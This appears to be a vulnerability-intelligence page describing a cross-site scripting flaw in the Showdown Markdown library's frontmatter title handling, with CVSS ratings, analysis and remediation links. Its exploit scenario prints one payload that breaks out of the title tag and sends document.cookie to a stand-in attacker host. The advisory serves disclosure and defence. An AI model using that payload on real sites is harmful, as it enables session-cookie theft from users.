Severity by source
CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:P/VC:L/VI:L/VA:N/SC:L/SI:L/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X
No privileges required to submit frontmatter content (PR:N); victim must load rendered page (UI:R); scope changes as victim browser session is affected (S:C), with limited confidentiality and integrity impact.
Primary rating from Vendor (VulnCheck).
CVSS VectorVendor: VulnCheck
CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:P/VC:L/VI:L/VA:N/SC:L/SI:L/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X
Lifecycle Timeline
1DescriptionCVE.org
showdown contains a cross-site scripting vulnerability in metadata title handling that allows attackers to inject arbitrary HTML and JavaScript. When completeHTMLDocument option is enabled, unescaped less-than and greater-than characters in markdown frontmatter metadata are inserted directly into HTML title tags, enabling attackers to break out of the title context and execute malicious scripts in the rendered page.
AnalysisAI
Cross-site scripting in Showdown (all versions ≤ 2.1.0) allows network-accessible injection of arbitrary HTML and JavaScript into rendered pages when the non-default completeHTMLDocument option is enabled. Unescaped < and > characters in Markdown frontmatter title metadata are written directly into the HTML <title> element, enabling title-context breakout and script execution in victim browsers. …
Unlock full vulnerability intelligence
- Risk assessment & exploitation conditions
- Attack chain visualization
- Remediation with exact patch versions
- Threat intelligence from 22 sources
- Personal watchlist & email alerts
Free forever · No credit card required
Attack ChainAIDerived
Hypothetical attack flow derived from CVE metadata
Vulnerability AssessmentAI
| Exploitation | Exploitation requires two concurrent conditions: first, the target application must explicitly enable Showdown's `completeHTMLDocument` option, which is not the default configuration - applications using Showdown for standard fragment rendering are not affected by this vulnerability. … Additional conditions and limiting factors are described in the full assessment. |
| Risk Assessment | The CVSS 4.0 score of 5.3 (Medium) is well-calibrated to the actual risk. … Full risk analysis with EPSS, KEV, and SSVC signal comparison available after sign-in. |
| Exploit Scenario | An attacker submits a Markdown document with a crafted frontmatter title - for example, `title: x</title><script>fetch('https://attacker.com/exfil?c='+document.cookie)</script>` - to a web application that processes user-supplied content with Showdown's `completeHTMLDocument` option enabled. The application renders and stores this output, and when a victim user loads the page, the injected script executes in their browser session, exfiltrating session cookies or performing authenticated actions on their behalf. … |
| Remediation | No vendor-released patched version has been confirmed at time of analysis; upstream fix progress can be tracked at https://github.com/showdownjs/showdown/issues/1047 and the VulnCheck advisory at https://www.vulncheck.com/advisories/showdown-cross-site-scripting-via-unescaped-metadata-title-in-completehtmldocument. … Detailed patch versions, workarounds, and compensating controls in full report. |
Threat intelligence, references, and detailed analysis are available after sign-in.
An issue in the anchors subparser of Showdownjs versions <= 2.1.0 could allow a remote attacker to cause denial of servi
Stored cross-site scripting in the showdown JavaScript Markdown-to-HTML library allows an unauthenticated attacker to in
Same weakness CWE-79 – Cross-site Scripting (XSS)
View allShare
External POC / Exploit Code
Leaving vuln.today
EUVD-2026-41948
GHSA-cr32-g25g-vxjj